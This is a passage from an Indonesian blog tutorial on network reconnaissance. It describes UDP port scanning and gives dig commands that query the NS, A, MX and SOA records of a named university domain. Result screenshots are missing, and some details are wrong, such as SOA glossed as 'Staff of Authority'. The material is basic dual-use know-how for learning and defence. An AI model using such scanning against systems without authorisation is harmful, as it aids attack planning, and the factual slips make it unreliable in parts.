Teknik ini untuk mengetahui port terbuka atau tertutup melalui paket yang dikirimnya. mengirimkan suatu paket UDP ke port host target. Bila port host target memberikan response pesan berupa “ICMP port unreachable” artinya port ini tertutup. Sebaliknya bila tidak menerima pesan tersebut, Anda dapat menyimpulkan bahwa port tersebut terbuka. Karena UDP dikenal sebagai connectionless protocol, maka akurasi teknik ini sangat bergantung pada banyak hal sehubungan dengan penggunaan jaringan dan sistem reources lainnya.hasilnya adalah ;

c. Dig
§  Dig merupakan bagian dari paket dnsutils. Dnsutils adalah klien yang disediakan oleh BIND (Nama Domain Internet).Untuk Ubuntu cara menginstalnya mudah tinggal ketik perintah sudo apt-get install dnsutils Setelah itu untuk menginstal dig yaitu dengan perintah sudo apt-get install dig
§  Contoh-contoh kasus penggunaan dig
1.    Misalnya kita ingin mengetahui IP address stikom-bali.ac.id dengan perintah dig, maka perintahnya adalah :
dig ns1.stikom-bali.ac.id
Maka hasilnya adalah;

2.    Atau Misalnya, kita ingin mengetahui DNS server yang melayani domain stikom-bali dengan perintah dig.
Maka perintah yang dimasukkan : dig stikom-bali.ac.id ns
maka hasilnya adalah;
3.    Ataupun Misalnya kita ingin mengetahui IP address dari mail dengan perintah dig pada stikom-bali, caranya :
dig mail.stikom-bali.ac.id
maka hasilnya adalah;


4.Selain itu kita juga bisa mengetahui email server yang melayani domain stikom-bali.ac.id, dengan perintah :
dig stikom-bali.ac.id mx
Maka hasilnya adalah;

5.Menggunakan dig untuk mengetahui SOA record
§  Kita dapat melihat primari server, kontak dan serial dari zona tersebut dengan SOA (Staff of Authority) Record.
§  Misalnya kita ingin mengetahui data-data dari stikom-bali. Maka, perintah yang digunakan :
dig stikom-bali.ac.id soa
§  Maka hasilnya adalah ;
Mudah-mudahan tulisan sederhana ini, dapat memberikan inspirasi bagi para penyerang maupun para sistem administrator dalam menangkal intelejen yang dilakukan para penyerang di Internet.


Reade more >>

Followers

visitor of state

like me on FaceBook